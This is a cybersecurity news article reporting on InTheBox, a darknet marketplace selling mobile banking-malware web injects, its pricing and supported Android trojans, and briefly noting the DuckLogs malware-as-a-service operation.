Researchers in cybersecurity have uncovered a darknet marketplace called InTheBox that caters specifically to mobile malware operators.
Since at least January 2020, the actor behind the criminal storefront is believed to have been selling more than 400 custom web injects organized by geography to other adversaries seeking to launch their attacks.
“The automation enables other malicious actors to place orders for the most recent web injects for use in mobile malware,” Resecurity explained.
“InTheBox is the largest and most likely the only company in its market category to provide high-quality web injects for prevalent forms of mobile malware,”
These pages typically resemble a legitimate bank login page and entice unsuspecting users to enter sensitive information such as credentials, payment card data, Social Security numbers (SSN), and card verification values (CVV), which are then used to compromise the bank account and commit fraud.
InTheBox is accessible via the Tor anonymity network and offers a variety of web inject templates for sale, with the listing accessible only after the administrator has verified and activated the customer’s account.
Web injects can be purchased for $100 per month or at the “unlim” tier for an unlimited number of injects during the subscription period. Costs for the unlimited plan range from $2,475 to $5,888 depending on the trojans supported.
Alien, Cerberus, ERMAC (and its successor MetaDroid), Hydra, and Octo are among the Android banking trojans supported by the service, the California-based cybersecurity company said.
The majority of high-demand injects are associated with payment services, such as digital banking and cryptocurrency exchangers, according to researchers. “During November 2022, the actor arranged a significant update of approximately 144 injects to improve their visual design.”
Cyble disclosed a new malware-as-a-service (MaaS) operation called DuckLogs, which costs $69.99 for lifetime access and gives threat actors the ability to harvest sensitive data, hijack cryptocurrency transactions, and remotely take control of machines.